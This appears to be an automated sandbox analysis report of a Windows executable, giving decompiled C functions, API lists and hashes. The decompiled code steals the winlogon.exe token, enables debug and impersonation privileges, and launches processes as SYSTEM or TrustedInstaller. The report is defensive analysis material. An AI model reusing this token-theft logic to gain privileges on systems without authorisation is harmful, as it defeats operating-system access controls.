0x00408816
0x0040881c
0x00408822
0x00408779
0x00408824
0x00408829
0x00408833
0x00408834
0x00408840
0x00408848
0x0040884c
0x00408850
0x00408855
0x0040885a
0x00408860
0x004088ac
0x004088b1
0x004088b3
0x004088bf
0x004088c5
0x004088cb
0x004088da
0x004088ea
0x004088ed
0x004088f8
0x004088ff
0x00408905
0x004088b5
0x004088b5
0x004088b5
0x00000000
0x00408862
0x00408862
0x0040886d
0x00408874
0x0040887b
0x00408882
0x00408889
0x00408895
0x00408897
0x00408658
0x00408658
0x0040865d
0x00408661
0x0040866a
0x00408673
0x00408678
0x00000000
0x00408678
0x00408860
0x00408695
0x00408695
0x0040869f
0x004086a2
0x004086af
0x004086a4
0x004086a7
0x004086a7
0x004086b4
0x004086bf
0x004086cb
0x004086d3
0x004086d7
0x004086db
0x004086e0
0x004086f1
0x004086f8
0x004086ff
0x00408706
0x0040870d
0x00408719
0x0040871b
0x00000000
0x0040871b
0x004085d5
0x004085da
0x00000000
0x00000000
0x004085ec
0x004085ef
0x004085f6
0x004085fd
0x00408604
0x0040860b
0x00408612
0x00408616
0x00408620
0x0040862a
0x00408632
0x00408633
0x00408638
0x0040864a
0x0040864f
0x00408651
0x00000000
0x0040854f
0x0040854f
0x00408550
0x00408556
0x00408556

APIs

Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
swscanf.MSVCRT ref: 00408620
_wtoi.MSVCRT ref: 00408633

Strings

XA, xrefs: 004088E5
/savelangfile, xrefs: 004088A3
%I64x, xrefs: 004085E7
/cfg, xrefs: 00408727
/Run, xrefs: 0040867F
, xrefs: 00408595
`oA, xrefs: 004088D0
SeDebugPrivilege, xrefs: 004085B3

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
API String ID: 3933224404-3784219877
Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243
processCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}

APIs

memset.MSVCRT ref: 0040201D
memset.MSVCRT ref: 00402035

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00402050
wcslen.MSVCRT ref: 0040205F
wcslen.MSVCRT ref: 004020B4
_wtoi.MSVCRT ref: 004020D7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61

Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

wcschr.MSVCRT ref: 00402259
CreateProcessW.KERNEL32 ref: 004022B8
GetLastError.KERNEL32(?,?,00000000), ref: 004022C2

Strings

TrustedInstaller.exe, xrefs: 0040219C
ServicesActive, xrefs: 0040216D
winlogon.exe, xrefs: 00402049, 00402076

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
API String ID: 3201562063-2355939583
Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59

Uniqueness

Uniqueness Score: -1.00%

Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

0x00409609
0x0040960f
0x00409619
0x00409623
0x0040962e
0x00409633
0x00409640
0x0040964a
0x00409782
0x0040965a
0x0040965f
0x00409678
0x0040967e
0x00409681
0x00409685
0x00409688
0x004096b2
0x004096bf
0x004096c6
0x004096cb
0x004096da
0x004096e6
0x0040973b
0x00409747
0x0040975f
0x00409764
0x0040976a
0x00409770
0x00409773
0x0040977d
0x00000000
0x0040977d
0x004096ee
0x004096f5
0x004096fc
0x00409704
0x0040970c
0x0040971c
0x0040971c
0x00409704
0x00409721
0x00409728
0x00409739
0x00409739
0x00000000
0x00409728
0x00409693
0x00000000
0x00000000
0x004096a5
0x004096a9
0x004096ac
0x00000000
0x00000000
0x00000000
0x004096ac
0x004097a6

APIs

Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB

CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
memset.MSVCRT ref: 0040962E
Process32FirstW.KERNEL32(?,?), ref: 0040964A
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
memset.MSVCRT ref: 004096C6
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Strings

QueryFullProcessImageNameW, xrefs: 00409706
kernel32.dll, xrefs: 004096F7

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 239888749-1740548384
Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}

0x00409924
0x0040992c
0x00409937
0x0040993f
0x0040994a
0x00409956
0x00409962
0x0040996e
0x00409971
0x00409973
0x00000000
0x00409976
0x00409977

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

Strings

GetModuleInformation, xrefs: 00409967
GetModuleFileNameExW, xrefs: 0040994F
psapi.dll, xrefs: 00409927
GetModuleBaseNameW, xrefs: 00409937
EnumProcessModules, xrefs: 00409943
EnumProcesses, xrefs: 0040995B

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$memsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1529661771-70141382
Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0040C390,00000070), ref: 0040B2D5
__set_app_type.MSVCRT ref: 0040B334
__p__fmode.MSVCRT ref: 0040B349
__p__commode.MSVCRT ref: 0040B357
__setusermatherr.MSVCRT ref: 0040B383
_initterm.MSVCRT ref: 0040B399
__wgetmainargs.KERNELBASE ref: 0040B3BC
_initterm.MSVCRT ref: 0040B3CF
GetStartupInfoW.KERNEL32(?), ref: 0040B42C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040B452
exit.KERNELBASE ref: 0040B469
_cexit.MSVCRT ref: 0040B46F

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}

0x00401ac9
0x00401ad1
0x00401ae1
0x00401ae7
0x00401ae9
0x00401aec
0x00401c1b
0x00401af2
0x00401af2
0x00401af8
0x00401b0c
0x00401b12
0x00401b1a
0x00401bfd
0x00401b20
0x00401b26
0x00401b2b
0x00401b36
0x00401b40
0x00401b43
0x00401b4a
0x00401b54
0x00401b55
0x00401b56
0x00401b57
0x00401b58
0x00401b63
0x00401b68
0x00401b69
0x00401b77
0x00401b7d
0x00401b82
0x00401b82
0x00401b88
0x00401b8b
0x00401b8e
0x00401b91
0x00401b98
0x00401b9b
0x00401ba0
0x00401ba5
0x00401baa
0x00401bac
0x00401bac
0x00401bb2
0x00401bb2
0x00401bbe
0x00401bc4
0x00401bc6
0x00401bc8
0x00401bc8
0x00401bd7
0x00401be6
0x00401bee
0x00401bf0
0x00401bf0
0x00401c02
0x00401c0e
0x00401c0e
0x00401c23

APIs

OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
memset.MSVCRT ref: 00401B4A
ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
_snwprintf.MSVCRT ref: 00401B69

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15

Strings

%d %I64x, xrefs: 00401B58

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
String ID: %d %I64x
API String ID: 1126726007-2565891505
Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}

APIs

memset.MSVCRT ref: 00401F27
memset.MSVCRT ref: 00401F3F

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00401F5A
wcslen.MSVCRT ref: 00401F69
ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Strings

winlogon.exe, xrefs: 00401F54, 00401F59, 00401F80
